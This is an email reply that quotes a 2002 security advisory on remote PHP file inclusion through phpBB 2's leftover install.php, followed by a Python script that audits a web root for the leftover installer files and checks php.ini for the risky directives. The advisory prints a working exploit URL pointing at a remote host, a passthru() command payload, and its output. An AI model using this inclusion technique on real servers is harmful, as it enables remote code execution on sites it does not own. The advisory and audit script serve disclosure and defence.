Morris,

The install instructions tell you to DELETE install.php. :)

Quoting the installation instructions (INSTALL.html):

"6. Important post-Install tasks for all installation methods

Once you have successfully installed phpBB 2.0.0 you MUST ensure you remove the install.php, upgrade.php and update_to_FINAL.php files. Leaving these in place is a very serious potential security issue. Additionally you may delete the db/schemas, docs/ and contrib/ directories if you wish.

With these files deleted you should proceed to the administration panel. Depending on how the installation completed you may have been directed there automatically. If not, login as the administrator you specified during install/upgrade and click the "Administration Panel" link at the bottom of any page. Ensure that details specified in General -> Configuration are correct!"

Nathan.

-----Original Message-----
From: morris Chang [mailto:onlooker@cnun.xsdeny.net]
Sent: Sunday, June 16, 2002 6:30 AM
To: bugtraq@securityfocus.com
Subject: malicious PHP source injection in phpBB

JCC Security Advisory
June 16, 2002

malicious PHP source injection in phpBB

Description

phpBB is one of the popular PHP bulletin board systems. When allow_url_fopen = On and register_globals = On in php.ini, phpBB is vulnerable because install.php contains dangerous code, so an attacker can include any file into the server's PHP code.

Impact

It has been tested on phpBB 2.0.1, but I think all of phpBB 2 is affected.

Workaround

Set allow_url_fopen = Off and register_globals = Off, and if the install is complete, remove or rename install.php.

Or, in install.php, after

-------install.php------------
define('IN_PHPBB', true);
$phpbb_root_path='./';
----------------------------

put

-------snip-----------------
$phpbb_root_dir='./';
----------------------------

It is a good idea to code that as

<<PHP_CODE
ini_set("register_globals", "Off");
ini_set("allow_url_fopen", "Off");
PHP_CODE

Tested systems

phpBB 2.0.1
Debian GNU/Linux SID (x86)

Background

We checked the vulnerability with

    http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE

and made a sample file, functions_selects.php:

--------------------includes/functions_selects.php--------------
<? passthru("uname -a"); ?>
-----------------------------------------

and typed the following URL to invoke this sample code.

TEST URL : http://URL/install.php?phpbb_root_dir=http://MYBOX/

-------output----------------------------
Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown

Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 182

Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 183

Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/install.php on line 346
-----------------------------------------

thx for BlackKnight at r0ar

---
http://jcc.hackerslab.org (at morris Chang)
e-mail : morris@xsdeny.net
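The thread boils down to two post-install checks: the installer scripts named in INSTALL.html must be gone from the web root, and the two php.ini directives the advisory names as preconditions for the remote include (register_globals, allow_url_fopen) should be Off. The script below is an added example written for this thread, not code from phpBB or from either poster; it walks a web root for the leftover files and parses php.ini text for the two directives. The sample web root and php.ini it builds are constructed here to mirror the vulnerable setup; the file names and directive names come from the messages above.

```python
"""Post-install audit for a phpBB 2.x web root (added example, not phpBB code).

Check 1: install.php / upgrade.php / update_to_FINAL.php must not be reachable.
Check 2: register_globals and allow_url_fopen should be Off in php.ini.
"""
import os
import tempfile

# File names INSTALL.html says must be removed after installation.
LEFTOVER_FILES = ("install.php", "upgrade.php", "update_to_FINAL.php")

# php.ini directives the advisory names as preconditions for the include attack.
RISKY_DIRECTIVES = ("register_globals", "allow_url_fopen")

# Values PHP treats as boolean true in ini files (compared case-insensitively).
_INI_TRUE = {"1", "on", "yes", "true"}


def find_leftover_files(webroot):
    """Return web-root-relative paths of leftover installer scripts, sorted."""
    found = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if name in LEFTOVER_FILES:
                found.append(os.path.relpath(os.path.join(dirpath, name), webroot))
    return sorted(found)


def parse_php_ini(text):
    """Minimal php.ini parser: 'key = value' lines; ';' comments and [sections] skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # drop trailing/inline comments
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"\'')
    return settings


def risky_directives(ini_text):
    """Return the subset of RISKY_DIRECTIVES that are enabled in ini_text."""
    settings = parse_php_ini(ini_text)
    return [d for d in RISKY_DIRECTIVES if settings.get(d, "").lower() in _INI_TRUE]


def audit(webroot, ini_text):
    """Run both checks and return a report; empty lists mean the check passed."""
    return {
        "leftover_files": find_leftover_files(webroot),
        "risky_directives": risky_directives(ini_text),
    }


# Constructed sample php.ini reproducing the vulnerable configuration.
SAMPLE_INI = """
[PHP]
register_globals = On   ; attacker controls $phpbb_root_dir via the query string
allow_url_fopen = On    ; include() will fetch http://MYBOX/... over the network
display_errors = Off
"""


def build_sample_webroot():
    """Create a throwaway directory tree with two leftover installer scripts."""
    root = tempfile.mkdtemp(prefix="phpbb2_")
    os.makedirs(os.path.join(root, "includes"))
    for name in ("index.php", "install.php", "upgrade.php"):
        open(os.path.join(root, name), "w").close()
    open(os.path.join(root, "includes", "functions_selects.php"), "w").close()
    return root


if __name__ == "__main__":
    print(audit(build_sample_webroot(), SAMPLE_INI))
```

Point it at the real document root and the php.ini the web server actually loads (check `php -i` or phpinfo() for the path, as a vhost may override it); a non-empty result in either list means the conditions the advisory describes are still present.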